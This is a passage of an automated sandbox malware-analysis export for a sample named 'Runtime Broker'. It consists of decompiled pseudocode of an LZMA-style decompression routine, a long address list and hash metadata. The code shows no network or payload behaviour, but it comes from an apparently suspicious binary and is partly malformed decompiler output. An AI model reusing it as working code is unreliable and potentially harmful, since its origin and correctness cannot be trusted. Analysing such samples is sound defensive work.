												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406efa
0x00406efa
0x00406efe
0x00406f1f
0x00406f26
0x00406f2c
0x00406f32
0x00406f44
0x00406f4a
0x00406f4f
0x00000000
0x00406f00
0x00406f06
0x004072c7
0x004072c7
0x004072c7
0x004072ca
0x004072ca
0x004072ca
0x004072d0
0x004072d6
0x004072dc
0x004072f6
0x004072f9
0x004072ff
0x0040730a
0x0040730c
0x004072de
0x004072de
0x004072ed
0x004072f1
0x004072f1
0x00407316
0x00000000
0x00000000
0x00407318
0x0040731c
0x004074cb
0x004074e1
0x004074e9
0x004074f0
0x004074f2
0x004074f9
0x004074fd
0x004074fd
0x00407328
0x0040732f
0x00407337
0x0040733a
0x0040733d
0x0040733d
0x00407343
0x00407343
0x00406adf
0x00406adf
0x00406adf
0x00406ae8
0x00000000
0x00000000
0x00406aee
0x00000000
0x00406af9
0x00000000
0x00000000
0x00406b02
0x00406b05
0x00406b08
0x00406b0c
0x00000000
0x00000000
0x00406b12
0x00406b15
0x00406b17
0x00406b18
0x00406b1b
0x00406b1d
0x00406b1e
0x00406b20
0x00406b23
0x00406b28
0x00406b2d
0x00406b36
0x00406b49
0x00406b4c
0x00406b58
0x00406b80
0x00406b82
0x00406b90
0x00406b90
0x00406b94
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b84
0x00406b84
0x00406b87
0x00406b88
0x00406b88
0x00000000
0x00406b84
0x00406b5e
0x00406b63
0x00406b63
0x00406b6c
0x00406b74
0x00406b77
0x00000000
0x00406b7d
0x00406b7d
0x00000000
0x00406b7d
0x00000000
0x00406b9a
0x00406b9a
0x00406b9e
0x0040744a
0x00000000
0x0040744a
0x00406ba7
0x00406bb7
0x00406bba
0x00406bbd
0x00406bbd
0x00406bbd
0x00406bc0
0x00406bc4
0x00000000
0x00000000
0x00406bc6
0x00406bcc
0x00406bf6
0x00406bfc
0x00406c03
0x00000000
0x00406c03
0x00406bd2
0x00406bd5
0x00406bda
0x00406bda
0x00406be5
0x00406bed
0x00406bf0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c35
0x00406c3b
0x00406c3e
0x00406c4b
0x00406c53
0x00000000
0x00000000
0x00406c0a
0x00406c0a
0x00406c0e
0x00407459
0x00000000
0x00407459
0x00406c1a
0x00406c25
0x00406c25
0x00406c25
0x00406c28
0x00406c2b
0x00406c2e
0x00406c33
0x00000000
0x00000000
0x00000000
0x00000000
0x004072ca
0x004072ca
0x004072d0
0x004072d6
0x004072dc
0x004072f6
0x004072f9
0x004072ff
0x0040730a
0x0040730c
0x004072de
0x004072de
0x004072ed
0x004072f1
0x004072f1
0x00407316
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c5b
0x00406c5d
0x00406c60
0x00406cd1
0x00406cd4
0x00406cd7
0x00406cde
0x00406ce8
0x004072c7
0x004072c7
0x00000000
0x004072c7
0x00406c62
0x00406c66
0x00406c69
0x00406c6b
0x00406c6e
0x00406c71
0x00406c73
0x00406c76
0x00406c78
0x00406c7d
0x00406c80
0x00406c83
0x00406c87
0x00406c8e
0x00406c91
0x00406c98
0x00406c9c
0x00406ca4
0x00406ca4
0x00406ca4
0x00406c9e
0x00406c9e
0x00406c9e
0x00406c93
0x00406c93
0x00406c93
0x00406ca8
0x00406cab
0x00406cc9
0x00406ccb
0x00000000
0x00406cad
0x00406cad
0x00406cb0
0x00406cb3
0x00406cb6
0x00406cb8
0x00406cb8
0x00406cb8
0x00406cbb
0x00406cbe
0x00406cc0
0x00406cc1
0x00406cc4
0x00000000
0x00406cc4
0x00000000
0x00000000
0x00000000
0x00406f64
0x00406f68
0x00406f8b
0x00406f8e
0x00406f91
0x00406f9b
0x00406f6a
0x00406f6a
0x00406f6d
0x00406f70
0x00406f73
0x00406f80
0x00406f83
0x00406f83
0x004072c7
0x004072c7
0x004072c7
0x00000000
0x004072c7
0x00000000
0x00406fa7
0x00406fab
0x00000000
0x00000000
0x00406fb1
0x00406fb5
0x00000000
0x00000000
0x00406fbb
0x00406fbd
0x00406fc1
0x00406fc1
0x00406fc4
0x00406fc8
0x00000000
0x00000000
0x00407018
0x0040701c
0x00407023
0x00407026
0x00407029
0x00407033
0x004072c7
0x004072c7
0x004072c7
0x00000000
0x004072c7
0x004072c7
0x0040701e
0x00000000
0x00000000
0x0040703f
0x00407043
0x0040704a
0x0040704d
0x00407050
0x00407045
0x00407045
0x00407045
0x00407053
0x00407056
0x00407059
0x00407059
0x0040705c
0x0040705f
0x00407062
0x00407062
0x00407065
0x0040706c
0x00407071
0x00000000
0x00000000
0x004070ff
0x004070ff
0x00407103
0x004074a1
0x00000000
0x004074a1
0x00407109
0x0040710c
0x0040710f
0x00407113
0x00407116
0x0040711c
0x0040711e
0x0040711e
0x0040711e
0x00407121
0x00407124
0x00000000
0x00000000
0x00406cf4
0x00406cf4
0x00406cf8
0x00407465
0x00000000
0x00407465
0x00406cfe
0x00406d01
0x00406d04
0x00406d08
0x00406d0b
0x00406d11
0x00406d13
0x00406d13
0x00406d13
0x00406d16
0x00406d19
0x00406d19
0x00406d1c
0x00406d1f
0x00000000
0x00000000
0x00406d25
0x00406d2b
0x00000000
0x00000000
0x00406d31
0x00406d31
0x00406d35
0x00406d38
0x00406d3b
0x00406d3e
0x00406d41
0x00406d42
0x00406d45
0x00406d47
0x00406d4d
0x00406d50
0x00406d53
0x00406d56
0x00406d59
0x00406d5c
0x00406d5f
0x00406d7b
0x00406d7e
0x00406d81
0x00406d84
0x00406d8b
0x00406d8f
0x00406d91
0x00406d95
0x00406d61
0x00406d61
0x00406d65
0x00406d6d
0x00406d72
0x00406d74
0x00406d76
0x00406d76
0x00406d98
0x00406d9f
0x00406da2
0x00000000
0x00406da8
0x00000000
0x00406da8
0x00000000
0x00406dad
0x00406dad
0x00406db1
0x00407471
0x00000000
0x00407471
0x00406db7
0x00406dba
0x00406dbd
0x00406dc1
0x00406dc4
0x00406dca
0x00406dcc
0x00406dcc
0x00406dcc
0x00406dcf
0x00406dd2
0x00406dd2
0x00406dd2
0x00406dd8
0x00000000
0x00000000
0x00406dda
0x00406ddd
0x00406de0
0x00406de3
0x00406de6
0x00406de9
0x00406dec
0x00406def
0x00406df2
0x00406df5
0x00406df8
0x00406e10
0x00406e13
0x00406e16
0x00406e19
0x00406e19
0x00406e1c
0x00406e20
0x00406e22
0x00406dfa
0x00406dfa
0x00406e02
0x00406e07
0x00406e09
0x00406e0b
0x00406e0b
0x00406e25
0x00406e2c
0x00406e2f
0x00000000
0x00406e31
0x00000000
0x00406e31
0x00406e2f
0x00406e36
0x00406e36
0x00406e36
0x00406e36
0x00000000
0x00000000
0x00406e71
0x00406e71
0x00406e75
0x0040747d
0x00000000
0x0040747d
0x00406e7b
0x00406e7e
0x00406e81
0x00406e85
0x00406e88
0x00406e8e
0x00406e90
0x00406e90
0x00406e90
0x00406e93
0x00406e96
0x00406e96
0x00406e9c
0x00406e3a
0x00406e3a
0x00406e3d
0x00000000
0x00406e3d
0x00406e9e
0x00406e9e
0x00406ea1
0x00406ea4
0x00406ea7
0x00406eaa
0x00406ead
0x00406eb0
0x00406eb3
0x00406eb6
0x00406eb9
0x00406ebc
0x00406ed4
0x00406ed7
0x00406eda
0x00406edd
0x00406edd
0x00406ee0
0x00406ee4
0x00406ee6
0x00406ebe
0x00406ebe
0x00406ec6
0x00406ecb
0x00406ecd
0x00406ecf
0x00406ecf
0x00406ee9
0x00406ef0
0x00406ef3
0x00000000
0x00406ef5
0x00000000
0x00406ef5
0x00000000
0x00407182
0x00407182
0x00407186
0x004074ad
0x00000000
0x004074ad
0x0040718c
0x0040718f
0x00407192
0x00407196
0x00407199
0x0040719f
0x004071a1
0x004071a1
0x004071a1
0x004071a4
0x00000000
0x00000000
0x00406f52
0x00406f52
0x00406f55
0x004072c7
0x004072c7
0x004072c7
0x00000000
0x004072c7
0x00000000
0x00407291
0x00407295
0x004072b7
0x004072ba
0x004072c4
0x004072c7
0x004072c7
0x004072c7
0x00000000
0x004072c7
0x004072c7
0x00407297
0x0040729a
0x0040729e
0x004072a1
0x004072a1
0x004072a4
0x00000000
0x00000000
0x0040734e
0x00407352
0x00407370
0x00407370
0x00407370
0x00407377
0x0040737e
0x00407385
0x00407385
0x00000000
0x00407385
0x00407354
0x00407357
0x0040735a
0x0040735d
0x00407364
0x004072a8
0x004072a8
0x004072ab
0x00000000
0x00000000
0x0040743f
0x00407442
0x00407343
0x00000000
0x00000000
0x00407079
0x0040707b
0x00407082
0x00407083
0x00407085
0x00407088
0x00000000
0x00000000
0x00407090
0x00407093
0x00407096
0x00407098
0x0040709a
0x0040709a
0x0040709b
0x0040709e
0x004070a5
0x004070a8
0x004070b6
0x00000000
0x00000000
0x0040738c
0x0040738c
0x0040738f
0x00407396
0x00000000
0x00000000
0x0040739b
0x0040739b
0x0040739f
0x004074d7
0x00000000
0x004074d7
0x004073a5
0x004073a8
0x004073ab
0x004073af
0x004073b2
0x004073b8
0x004073ba
0x004073ba
0x004073ba
0x004073bd
0x004073c0
0x004073c0
0x004073c0
0x004073c0
0x004073c3
0x004073c3
0x004073c7
0x00407427
0x0040742a
0x0040742f
0x00407430
0x00407432
0x00407434
0x00407437
0x00407343
0x00407343
0x00000000
0x00407349
0x00407343
0x004073c9
0x004073cf
0x004073d2
0x004073d5
0x004073d8
0x004073db
0x004073de
0x004073e1
0x004073e4
0x004073e7
0x004073ea
0x00407403
0x00407406
0x00407409
0x0040740c
0x00407410
0x00407412
0x00407412
0x00407413
0x00407416
0x004073ec
0x004073ec
0x004073f4
0x004073f9
0x004073fb
0x004073fe
0x004073fe
0x00407419
0x00407420
0x00000000
0x00407422
0x00000000
0x00407422
0x00000000
0x004070be
0x004070c1
0x004070f7
0x00407227
0x00407227
0x00407227
0x00407227
0x0040722a
0x0040722a
0x0040722d
0x0040722f
0x004074b9
0x00000000
0x004074b9
0x00407235
0x00407238
0x00000000
0x00000000
0x0040723e
0x00407242
0x00407245
0x00407245
0x00407245
0x00000000
0x00407245
0x004070c3
0x004070c5
0x004070c7
0x004070c9
0x004070cc
0x004070cd
0x004070cf
0x004070d1
0x004070d4
0x004070d7
0x004070ed
0x004070f2
0x0040712a
0x0040712a
0x0040712e
0x0040715a
0x0040715c
0x00407163
0x00407166
0x00407169
0x00407169
0x0040716e
0x0040716e
0x00407170
0x00407173
0x0040717a
0x0040717d
0x004071aa
0x004071aa
0x004071ad
0x004071b0
0x00407224
0x00407224
0x00407224
0x00000000
0x00407224
0x004071b2
0x004071b8
0x004071bb
0x004071be
0x004071c1
0x004071c4
0x004071c7
0x004071ca
0x004071cd
0x004071d0
0x004071d3
0x004071ec
0x004071ee
0x004071f1
0x004071f2
0x004071f5
0x004071f7
0x004071fa
0x004071fc
0x004071fe
0x00407201
0x00407203
0x00407206
0x0040720a
0x0040720c
0x0040720c
0x0040720d
0x00407210
0x00407213
0x004071d5
0x004071d5
0x004071dd
0x004071e2
0x004071e4
0x004071e7
0x004071e7
0x00407216
0x0040721d
0x004071a7
0x004071a7
0x004071a7
0x004071a7
0x00000000
0x0040721f
0x00000000
0x0040721f
0x0040721d
0x00407130
0x00407133
0x00407135
0x00407138
0x0040713b
0x0040713e
0x00407140
0x00407143
0x00407146
0x00407146
0x00407149
0x00407149
0x0040714c
0x00407153
0x00407127
0x00407127
0x00407127
0x00407127
0x00000000
0x00407155
0x00000000
0x00407155
0x00407153
0x004070d9
0x004070dc
0x004070de
0x004070e1
0x00000000
0x00000000
0x00406e40
0x00406e40
0x00406e44
0x00407489
0x00000000
0x00407489
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5e
0x00406e61
0x00406e64
0x00406e67
0x00406e69
0x00406e69
0x00406e69
0x00000000
0x00000000
0x00406fcb
0x00406fcb
0x00406fcf
0x00407495
0x00000000
0x00407495
0x00406fd5
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe0
0x00406fe0
0x00406fe0
0x00406fe3
0x00406fe6
0x00406fe9
0x00406fec
0x00406fef
0x00406ff2
0x00406ff3
0x00406ff5
0x00406ff5
0x00406ff5
0x00406ff8
0x00406ffb
0x00406ffe
0x00407001
0x00407001
0x00407001
0x00407004
0x00407006
0x00407006
0x00000000
0x00000000
0x00407248
0x00407248
0x00407248
0x0040724c
0x00000000
0x00000000
0x00407252
0x00407255
0x00407258
0x0040725b
0x0040725d
0x0040725d
0x0040725d
0x00407260
0x00407263
0x00407266
0x00407269
0x0040726c
0x0040726f
0x00407270
0x00407272
0x00407272
0x00407272
0x00407275
0x00407278
0x0040727b
0x0040727e
0x00407281
0x00407285
0x00407287
0x0040728a
0x00000000
0x0040728c
0x00407009
0x00407009
0x00000000
0x00407009
0x0040728a
0x004074bf
0x00000000
0x00000000
0x00406aee
0x004074f6
0x004074f6
0x00000000
0x004074f6
0x00407343
0x004072ca
0x004072c7
0x00000000
0x00406efe

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db5198ca4190c6b334929519d9078d0b7c25f309867be5a342d9eedfd0dff6d3
Instruction ID: b4a429368d408adc735ccef7c69d02ca95e21b2dffe456e9be617d596e32585a
Opcode Fuzzy Hash: db5198ca4190c6b334929519d9078d0b7c25f309867be5a342d9eedfd0dff6d3
Instruction Fuzzy Hash: 44711371D04228CFDF28CFA8C954BADBBB1FB44305F15806AD856BB281D7386986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00407018, Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00407018() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004074FE))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
